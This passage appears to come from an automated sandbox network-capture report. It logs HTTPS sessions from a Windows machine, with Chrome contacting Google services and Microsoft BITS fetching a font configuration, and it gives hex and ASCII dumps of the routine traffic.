a\|\|null};\n_.ue\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u
2024-11-11 23:06:09 UTC	1378	IN	Data Raw: 38 30 30 30 0d 0a 2c 63 29 3a 5f 2e 6f 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 6f 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 74 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 72 61 6d 65 62 6f 72 64 65 72 3a 5c 22 66 72 61 6d 65 42 6f 72 64 65 72 5c 22 2c 68 65 69 67 68 74 3a 5c 22 68 65 69 67 68 74 5c 22 2c 6d 61 78 6c 65 6e 67 74 68 3a 5c 22 6d 61 78 4c 65 6e 67 74 68 5c 22 2c 6e 6f 6e 63 65 3a 5c 22 6e 6f 6e 63 65 5c 22 2c 72 6f Data Ascii: 8000,c):_.oe(d,\"aria-\")\|\|_.oe(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};te\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",frameborder:\"frameBorder\",height:\"height\",maxlength:\"maxLength\",nonce:\"nonce\",ro

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49711	142.250.185.196	443	5944	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:09 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 23:06:09 UTC	957	IN	HTTP/1.1 200 OK Version: 693618659 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 11 Nov 2024 23:06:09 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-11 23:06:09 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-11 23:06:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	216.58.206.46	443	5944	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:12 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 23:06:12 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Mon, 11 Nov 2024 00:32:18 GMT Expires: Tue, 11 Nov 2025 00:32:18 GMT Cache-Control: public, max-age=31536000 Age: 81234 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-11 23:06:12 UTC	463	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 Data Ascii: totype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)retu
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 Data Ascii: ar b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.as
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74 Data Ascii: function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63 Data Ascii: promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=func
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f Data Ascii: or("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));fo
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 Data Ascii: r h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return t
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73 Data Ascii: e=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 Data Ascii: pe.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)r
2024-11-11 23:06:12 UTC	1378	IN	Data Raw: 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 Data Ascii: +9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49723	142.250.186.110	443	5944	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:12 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 905 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-11 23:06:12 UTC	905	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 33 36 36 33 37 30 37 39 31 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731366370791",null,null,null,
2024-11-11 23:06:13 UTC	942	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=Q3V6gjI0oUlAeqroIEhhZSikSv2ekJ_ctBtuTtDRKpIoLdG89zUwiL8Luy7aI6efjcHdM3GShjM8c3HKT4R1Jm9ysRl-JxP3Ch4jmbtLBAtWxiOmUfTWTty6uqrPyUJGe3pkua1nRAmG5H_Ssh7oIOOxi0Y5PH137GnHWovOLmj_FLGaRLvAJJHL; expires=Tue, 13-May-2025 23:06:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Mon, 11 Nov 2024 23:06:13 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Mon, 11 Nov 2024 23:06:13 GMT Connection: close Transfer-Encoding: chunked
2024-11-11 23:06:13 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-11 23:06:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49724	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:13 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-11 23:06:14 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF45) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=236368 Date: Mon, 11 Nov 2024 23:06:14 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49730	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:14 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-11 23:06:15 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=236331 Date: Mon, 11 Nov 2024 23:06:14 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-11 23:06:15 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49731	142.250.186.110	443	5944	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
